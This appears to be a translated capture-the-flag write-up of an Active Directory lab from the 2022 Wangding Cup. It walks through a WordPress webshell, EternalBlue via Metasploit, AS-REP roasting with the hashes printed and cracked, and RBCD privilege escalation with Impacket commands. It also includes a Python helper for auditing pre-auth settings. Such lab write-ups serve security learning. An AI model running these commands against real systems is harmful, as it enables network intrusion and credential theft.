Target description:
This range is a replay of the internal-network range from the 2022 third Wangding Cup (网鼎杯) final. Completing it helps players understand proxy forwarding, internal-network scanning, information gathering, privilege escalation and lateral movement in intranet penetration, strengthens understanding of the core authentication mechanism of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags, spread across different hosts.
flag1
The site is a blog.
Ran the usual fscan scan; nothing useful turned up.
dirsearch scan: it is a WordPress blog, so the usual approach is to log into the admin backend and look for an upload point.
Visited /wp-admin and reached the backend login page; weak credentials admin:123456.
After logging in, wrote a PHP webshell in the Appearance editor (Update File).
For a webshell client I usually use AntSword (蚁剑), which has plenty of plugins.
Found flag1 in the root directory:
flag{6b055a1f-b8ea-4cce-91a9-d8ab0af58839}
flag2
Once we have a shell, set up frp, upload fscan and keep scanning.
For the exact configuration, see the article on intranet proxying, VM, frp and Proxifier global traffic forwarding.
The scan turned up a lot of information; tidied up:
172.22.15.13  XR-DC01   (domain controller; OsInfo)
172.22.15.24  XR-WIN08  (MS17-010)
172.22.15.35  XR-0687   (domain XIAORANG)
172.22.15.18  XR-CA     (poc-yaml-active-directory-certsrv-detect, i.e. an AD CS server)
172.22.15.26  this host
Hit 172.22.15.24 with EternalBlue (MS17-010):
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
run
Looked through the directories one by one; the flag is usually on the desktop.
chcp 65001
to fix the garbled console output.
Found the flag in the C:\Users\Administrator\flag directory;
type shows the file contents:
flag02: flag{b10a255c-cc64-44c2-86e2-c5bc4a28b168}
flag3
Logged into the OA system on 172.22.15.24 with the weak credentials admin:123456.
Under Team - Colleagues, found many e-mail addresses.
Build a username dictionary from the e-mail addresses for the user enumeration that follows.
Collected the addresses from that page.
For an explanation of AS-REP Roasting, see: AS-REP Roasting & Kerberoasting
For Impacket, see: Impacket script usage guide
Request the TGTs (AS-REP hashes) for the user list:
impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
$krb5asrep$23$lixiuying@XIAORANG.LAB:6ba28153c42feb97bacf209f2d42be2a$791a156f99eb4008f1080f78397c027262e8335cd543b0183aae679cf1252a92e44cb47cea392a0d13fd90ef182a7f5ada7130f2bae83d143e862eced5fd362f92aaeadc3bf27883b9f573a6f5f9347220a7a51f623da964079ea18a246a7a66f019f9ce513776a395185d5d9baf9082198bf4bca6d52f2ac01ae15656ceb19a62bf5d467a82b2be5711499a75f3dc36c45d0757d074f83cb1e01ab177e44d5cb368b2ddd9de317ce1426e63e173e74e4958fa132a2f3bcabc737e0ff7377d010c7b4eacdef1ebed0df16f42a2e36c3c4b845f5b694024db190325e2c43a3fa6299e9ce1caddca318fc0aaa6
$krb5asrep$23$huachunmei@XIAORANG.LAB:1fa246d4debf60012251f8e4a9ba8a3e$876521f90cb6cf3e4a0754dc03fb448852e3b474ffb021d3e8843f37c912c420d997a14ba7c51779793feb69accf21ced4f9d83192170930f540426102a330cbebae728278d75a9bbbf717fbfce1af6e350981729c6c4e7e4ff16f364117cb67dbab5ea408fad4cebac3c87ff98602fcd23247f2a71c473c97899f9acef80f3d2d47432544884cfafe82710199eb81ec83a87ef133637caf69ac99b3eaab41bc6ea57a86dd9aa04356d3a5c2a7468267c137a4d58964c9c8ace204ce83116860bb848a358f2db1ec59eb1c64334074d71c807a7ad9c1bb2572e9c42d7aa5e3fedc4fbb52ea6ca84f09facf68
Crack them with hashcat:
hashcat -m 18200 --force -a 0 '$krb5asrep$23$lixiuying@XIAORANG.LAB:6ba28153c42feb97bacf209f2d42be2a$791a156f99eb4008f1080f78397c027262e8335cd543b0183aae679cf1252a92e44cb47cea392a0d13fd90ef182a7f5ada7130f2bae83d143e862eced5fd362f92aaeadc3bf27883b9f573a6f5f9347220a7a51f623da964079ea18a246a7a66f019f9ce513776a395185d5d9baf9082198bf4bca6d52f2ac01ae15656ceb19a62bf5d467a82b2be5711499a75f3dc36c45d0757d074f83cb1e01ab177e44d5cb368b2ddd9de317ce1426e63e173e74e4958fa132a2f3bcabc737e0ff7377d010c7b4eacdef1ebed0df16f42a2e36c3c4b845f5b694024db190325e2c43a3fa6299e9ce1caddca318fc0aaa6' /usr/share/wordlists/rockyou.txt
hashcat -m 18200 --force -a 0 '$krb5asrep$23$huachunmei@XIAORANG.LAB:1fa246d4debf60012251f8e4a9ba8a3e$876521f90cb6cf3e4a0754dc03fb448852e3b474ffb021d3e8843f37c912c420d997a14ba7c51779793feb69accf21ced4f9d83192170930f540426102a330cbebae728278d75a9bbbf717fbfce1af6e350981729c6c4e7e4ff16f364117cb67dbab5ea408fad4cebac3c87ff98602fcd23247f2a71c473c97899f9acef80f3d2d47432544884cfafe82710199eb81ec83a87ef133637caf69ac99b3eaab41bc6ea57a86dd9aa04356d3a5c2a7468267c137a4d58964c9c8ace204ce83116860bb848a358f2db1ec59eb1c64334074d71c807a7ad9c1bb2572e9c42d7aa5e3fedc4fbb52ea6ca84f09facf68' /usr/share/wordlists/rockyou.txt
Cracked results:
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx
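An added example (not from the original writeup, and not Impacket's or hashcat's code): a small Python helper that parses the `$krb5asrep$23$...` lines GetNPUsers printed above into their fields, and an audit function that flags accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit, the setting that made lixiuying and huachunmei roastable in the first place. The sample hash line, the account list and the name `zhangsan` are constructed.

```python
import re
from dataclasses import dataclass

# Layout of a hashcat mode-18200 line (RC4-HMAC, etype 23) as printed by GetNPUsers:
#   $krb5asrep$23$<user>@<REALM>:<16-byte HMAC-MD5 checksum>$<RC4 ciphertext of the enc-part>
ASREP_LINE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# userAccountControl bit "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH)
DONT_REQ_PREAUTH = 0x400000

@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes   # HMAC-MD5 over confounder||plaintext, keyed from the user's NT hash
    edata: bytes      # RC4 ciphertext of the AS-REP enc-part, the material that is cracked offline

    @property
    def offline_crackable(self) -> bool:
        # etype 23 derives the RC4-HMAC key directly from the NT hash; AES etypes use a salted PBKDF2 key
        return self.etype == 23

def parse_asrep(line: str) -> AsRepHash:
    """Parse one GetNPUsers/hashcat AS-REP line; raises ValueError on a mangled line."""
    m = ASREP_LINE.match(line.strip())
    if m is None:
        raise ValueError("not a $krb5asrep$ line")
    return AsRepHash(int(m["etype"]), m["user"], m["realm"],
                     bytes.fromhex(m["checksum"]), bytes.fromhex(m["edata"]))

def preauth_disabled(accounts: list) -> list:
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set (sorted)."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if int(a["userAccountControl"]) & DONT_REQ_PREAUTH)

# Constructed sample data (not the real hashes or directory from the range)
SAMPLE_LINE = "$krb5asrep$23$lixiuying@XIAORANG.LAB:" + "6b" * 16 + "$" + "79" * 48
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "lixiuying",  "userAccountControl": 0x410200},  # NORMAL|DONT_EXPIRE|DONT_REQ_PREAUTH
    {"sAMAccountName": "huachunmei", "userAccountControl": 0x400200},  # NORMAL|DONT_REQ_PREAUTH
    {"sAMAccountName": "zhangsan",   "userAccountControl": 0x10200},   # NORMAL|DONT_EXPIRE (hypothetical)
]
```

Running `preauth_disabled` over a real LDAP export is the defender-side check that finds these accounts before anyone else does; enforcing pre-authentication on them removes the AS-REP hash entirely.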
To find which machine these credentials work on, spray them with crackmapexec.
After trying, they only log in to 172.22.15.35.
Enumerate the current user's (lixiuying) DACL on the current machine:
GenericWrite
which means any attribute of that machine object can be modified.
Use BloodHound to analyse the domain environment:
bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
Analysing the domain environment also shows the GenericWrite right,
so privilege escalation via RBCD (resource-based constrained delegation) is possible:
python addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
python rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'TEST$'
python getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
python psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
Got flag3.
flag4
The last step should be domain privilege escalation, but I ran out of 沙砾 (range credits) again, so it will have to wait until next time.
Originally published on the WeChat public account (flowers-boy): 2022 Wangding Cup semi-final retrospective